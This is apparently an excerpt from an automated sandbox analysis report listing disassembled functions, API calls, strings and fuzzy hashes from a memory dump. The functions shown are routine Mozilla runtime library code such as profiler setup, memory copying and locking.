                                                        • Instruction ID: f68232021e11f8fbd1f690c336946e0d644ea65fc3fd532aaf3741e24851ce70
                                                        • Opcode Fuzzy Hash: 04e61468ba15e1e96c321719be839cc696a0533fdc6e02e80e976b21bdb336a2
                                                        • Instruction Fuzzy Hash: 1F3122B1A05208CBCB00DFAAD880AAEB7B5BF04308F54453DD802A7F41D735E849CBA1
                                                        Function 6C0CF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(shell32,?,6C13D020), ref: 6C0CF122
                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0CF132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: SHGetKnownFolderPath$shell32
                                                        • API String ID: 2574300362-1045111711
                                                        • Opcode ID: b7de78cd7ec52db3a4cbea1e9da0c1011102491a7628901b9fa2a6cbb1ac9885
                                                        • Instruction ID: f074c6d228a9019ac394e572f2a17cf5505ee5a4328d5969873ad33ce6f7c13f
                                                        • Opcode Fuzzy Hash: b7de78cd7ec52db3a4cbea1e9da0c1011102491a7628901b9fa2a6cbb1ac9885
                                                        • Instruction Fuzzy Hash: C6014C717012159BCB00EF6AD848A5F7BF8EF4A658B504419E859E7300D730AA04CBA1
                                                        Function 6C10E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10E577
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E584
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E5DE
                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C10E8A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                        • API String ID: 1483687287-53385798
                                                        • Opcode ID: a1dd0d4277c5c7b346499cbe5041eb5d783571b46516eb381e9ee27dd6c2701e
                                                        • Instruction ID: cb88c52848aaa894cf7a74db96a9019cb9596b71e1d2ccc3d537aa08f4ea3fc9
                                                        • Opcode Fuzzy Hash: a1dd0d4277c5c7b346499cbe5041eb5d783571b46516eb381e9ee27dd6c2701e
                                                        • Instruction Fuzzy Hash: 1F11AD31B04658DFCB00AF15C848B6ABBB4FF8932CF488619E8A557B90DB70A905DBD5
                                                        Function 6C0D2272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0D237F
                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0D2B9C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: f5a05e784aa66924aa1b8db184dd906ae72f09cf5a875e89f5ace917a885a75b
                                                        • Instruction ID: 28b639e1db5ff9583530ee31bce0aeb8c0fd8fe0f77f335e60b14b3562d934a4
                                                        • Opcode Fuzzy Hash: f5a05e784aa66924aa1b8db184dd906ae72f09cf5a875e89f5ace917a885a75b
                                                        • Instruction Fuzzy Hash: 7BE13871A003069FDB18CF59C894B9EBBF2BF88314F1A8169E9099B745D771EC85CB90
                                                        Function 6C110C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C110CD5
                                                          • Part of subcall function 6C0FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0FF9A7
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C110D40
                                                        • free.MOZGLUE ref: 6C110DCB
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                        • free.MOZGLUE ref: 6C110DDD
                                                        • free.MOZGLUE ref: 6C110DF2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                        • String ID:
                                                        • API String ID: 4069420150-0
                                                        • Opcode ID: 9a5b34a38e22a2d32fb055c713968e805a04d1b57f08ccac6d2b1e4bbdb020c3
                                                        • Instruction ID: fb577f5155006b74912cc803e752f49a2efc72926a293f27caccae2ae78782c1
                                                        • Opcode Fuzzy Hash: 9a5b34a38e22a2d32fb055c713968e805a04d1b57f08ccac6d2b1e4bbdb020c3
                                                        • Instruction Fuzzy Hash: D941477591C7908BD720CF29C08039AFBE5BFC8714F118A2EE8D887B10DB74A494CB82
                                                        Function 6C119120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C118242,?,00000000,?,6C10B63F), ref: 6C119188
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C118242,?,00000000,?,6C10B63F), ref: 6C1191BB
                                                        • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C118242,?,00000000,?,6C10B63F), ref: 6C1191EB
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C118242,?,00000000,?,6C10B63F), ref: 6C119200
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C118242,?,00000000,?,6C10B63F), ref: 6C119219
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: malloc$freememcpy
                                                        • String ID:
                                                        • API String ID: 4259248891-0
                                                        • Opcode ID: dcda02ac784397b7127e4dd0645e195b07dd4aafa1be48b92d7df7f0a80d0dd8
                                                        • Instruction ID: 3fac11cbbc594d4acfb0f7998f656883ba777cf46f064a830c88da608b1b12ee
                                                        • Opcode Fuzzy Hash: dcda02ac784397b7127e4dd0645e195b07dd4aafa1be48b92d7df7f0a80d0dd8
                                                        • Instruction Fuzzy Hash: EA319731A086058FEB00DF6CCC5436A73E5EF91325F118639D866C7A40EB39E948CBA1
                                                        Function 6C100800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C100838
                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C10084C
                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1008AF
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C1008BD
                                                        • LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C1008D5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$memset
                                                        • String ID:
                                                        • API String ID: 837921583-0
                                                        • Opcode ID: a7f401fab6aea1940a9cd45a0c3aba74a682e694e93e9e905fd053298ce1d6d4
                                                        • Instruction ID: 024c6f24b6b017ee3731475d4aeff0190a5af82ecd48bb6ed2e26b79f9a16f1e
                                                        • Opcode Fuzzy Hash: a7f401fab6aea1940a9cd45a0c3aba74a682e694e93e9e905fd053298ce1d6d4
                                                        • Instruction Fuzzy Hash: 0E210431B052098BEF04EF65D848FAEB7B9BF8570DF504529D909A7B00DF32A9148BD0
                                                        Function 6C11CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11CDA4
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                          • Part of subcall function 6C11D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C11CDBA,00100000,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11D158
                                                          • Part of subcall function 6C11D130: InitializeConditionVariable.KERNEL32(00000098,?,6C11CDBA,00100000,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11D177
                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11CDC4
                                                          • Part of subcall function 6C117480: ReleaseSRWLockExclusive.KERNEL32(?,6C1215FC,?,?,?,?,6C1215FC,?), ref: 6C1174EB
                                                        • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11CECC
                                                          • Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2
                                                          • Part of subcall function 6C10CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C11CEEA,?,?,?,?,00000000,?,6C10DA31,00100000,?,?,00000000), ref: 6C10CB57
                                                          • Part of subcall function 6C10CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C10CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C11CEEA,?,?), ref: 6C10CBAF
                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11D058
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                        • String ID:
                                                        • API String ID: 861561044-0
                                                        • Opcode ID: 963a2c225c72aa1ce7592dca935689a11bf845418c2797963ee4b4cab7a5d49c
                                                        • Instruction ID: b3bf35404e8b4715ca2e8393169a91afcf28d7fb25b9fc5889a9dd58d8914f51
                                                        • Opcode Fuzzy Hash: 963a2c225c72aa1ce7592dca935689a11bf845418c2797963ee4b4cab7a5d49c
                                                        • Instruction Fuzzy Hash: 9BD18F71A08B469FC708DF28C490B99F7E1BF99308F01866DD9598BB11EB31F965CB81
                                                        Function 6C0D1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0D17B2
                                                        • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0D18EE
                                                        • free.MOZGLUE(?), ref: 6C0D1911
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0D194C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                        • String ID:
                                                        • API String ID: 3725304770-0
                                                        • Opcode ID: d5faa02f93ade854c7256a971045a631cd779c3e9c4d472f3c5c2d9d90cec7d3
                                                        • Instruction ID: 96959da536aec276d631e512f79ce1f1a0ef073b7dbb06fdd2c5141cb3052bed
                                                        • Opcode Fuzzy Hash: d5faa02f93ade854c7256a971045a631cd779c3e9c4d472f3c5c2d9d90cec7d3
                                                        • Instruction Fuzzy Hash: D581B370A153159FDB08CF68D894AAEBBF1FF89324F05452CE815AB750DB30E945CBA1
                                                        Function 6C0E5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount64.KERNEL32 ref: 6C0E5D40
                                                        • EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67
                                                        • __aulldiv.LIBCMT ref: 6C0E5DB4
                                                        • LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E5DED
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                        • String ID:
                                                        • API String ID: 557828605-0
                                                        • Opcode ID: ae95163b01fa134e0ae61f0f4aa05ab2dc76efdb2ded4407ff9b7b7c9482de59
                                                        • Instruction ID: 9b7fa298747ec08c1b8a26423e2eecfe9fd827b25e3bbf70bff5fda7d5446551
                                                        • Opcode Fuzzy Hash: ae95163b01fa134e0ae61f0f4aa05ab2dc76efdb2ded4407ff9b7b7c9482de59
                                                        • Instruction Fuzzy Hash: 8D517F75E041298FCF18DF68C854BAEBBF2FB89308F198A19C825A7750D7306946CB90
                                                        Function 6C127170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount64.KERNEL32 ref: 6C127250
                                                        • EnterCriticalSection.KERNEL32(6C14F688), ref: 6C127277
                                                        • __aulldiv.LIBCMT ref: 6C1272C4
                                                        • LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C1272F7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                        • String ID:
                                                        • API String ID: 557828605-0
                                                        • Opcode ID: 662b8b2a807ba9577d1191835c1fec0c264f970356b5637cd3ee85e46f1621a6
                                                        • Instruction ID: e25e2008936a7e972b0461bb9bde9359229618ab3a5003f7a776e3607eacdeef
                                                        • Opcode Fuzzy Hash: 662b8b2a807ba9577d1191835c1fec0c264f970356b5637cd3ee85e46f1621a6
                                                        • Instruction Fuzzy Hash: 51515F75E001298FCF08DFA9C851ABFBBB1FB89308F15861AD825A7750D7356986CBD0
                                                        Function 6C0CCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0CCEBD
                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C0CCEF5
                                                        • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C0CCF4E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$memset
                                                        • String ID: 0
                                                        • API String ID: 438689982-4108050209
                                                        • Opcode ID: b1e65be15f80ac1e1631e108a9b3ccf9b866ba9a115a55aa42b9d75800ac81db
                                                        • Instruction ID: 917d8cb3fbe9a93e5a22a6878c31e94cd779173e519025a06c835b848b7bb7ef
                                                        • Opcode Fuzzy Hash: b1e65be15f80ac1e1631e108a9b3ccf9b866ba9a115a55aa42b9d75800ac81db
                                                        • Instruction Fuzzy Hash: A351F275A0026A8FCB00CF18C490B9AFBE5EF99304F198699D8595F352D731ED06CBE0
                                                        Function 6C1277D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1277FA
                                                        • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C127829
                                                          • Part of subcall function 6C0FCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0C31A7), ref: 6C0FCC45
                                                          • Part of subcall function 6C0FCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0C31A7), ref: 6C0FCC4E
                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C12789F
                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C1278CF
                                                          • Part of subcall function 6C0C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0C4E5A
                                                          • Part of subcall function 6C0C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0C4E97
                                                          • Part of subcall function 6C0C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C103EBD,6C103EBD,00000000), ref: 6C0C42A9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                        • String ID:
                                                        • API String ID: 2525797420-0
                                                        • Opcode ID: 6e1a678e17cf9a024f3d66449b6336c32d48a686f5a3cd1e8c4acf0a98d01b3b
                                                        • Instruction ID: cbc2f340638b7994f42acb9fed830cbb1529365645c95065310828ea658692e9
                                                        • Opcode Fuzzy Hash: 6e1a678e17cf9a024f3d66449b6336c32d48a686f5a3cd1e8c4acf0a98d01b3b
                                                        • Instruction Fuzzy Hash: 3E41AE75A047469BD300DF29D48056BFBF4FF8A258F204A2EE4A987640DB70E599CBD2
                                                        Function 6C11DAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11DB86
                                                        • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11DC0E
                                                        • free.MOZGLUE(?), ref: 6C11DC2E
                                                        • free.MOZGLUE(?), ref: 6C11DC40
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Impl@detail@mozilla@@Mutexfree
                                                        • String ID:
                                                        • API String ID: 3186548839-0
                                                        • Opcode ID: 1f6c59211ca1e0aa9d11a3bc699de75dd57e67a36c0ae95046fef9f2bb1e2afa
                                                        • Instruction ID: f53ee74e322eb49f1238e64a4991b27adefef5959d2966b240898973c5f2bc64
                                                        • Opcode Fuzzy Hash: 1f6c59211ca1e0aa9d11a3bc699de75dd57e67a36c0ae95046fef9f2bb1e2afa
                                                        • Instruction Fuzzy Hash: 374177B56047008FC710DF34C088B5ABBF6AF89258F55886DE8AA87B40EB35E944CB51
                                                        Function 6C106470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C1082BC,?,?), ref: 6C10649B
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1064A9
                                                          • Part of subcall function 6C0FFA80: GetCurrentThreadId.KERNEL32 ref: 6C0FFA8D
                                                          • Part of subcall function 6C0FFA80: AcquireSRWLockExclusive.KERNEL32(6C14F448), ref: 6C0FFA99
                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C10653F
                                                        • free.MOZGLUE(?), ref: 6C10655A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 3596744550-0
                                                        • Opcode ID: 79e7b85c3da8cdb2c6c546bd9491edbc3ed30ccc87e3590b0bc00bebb34a03be
                                                        • Instruction ID: c86d12365eae396f66b3bdfa9f2edcf17deabe05c384e41a40bd627dbaff8e92
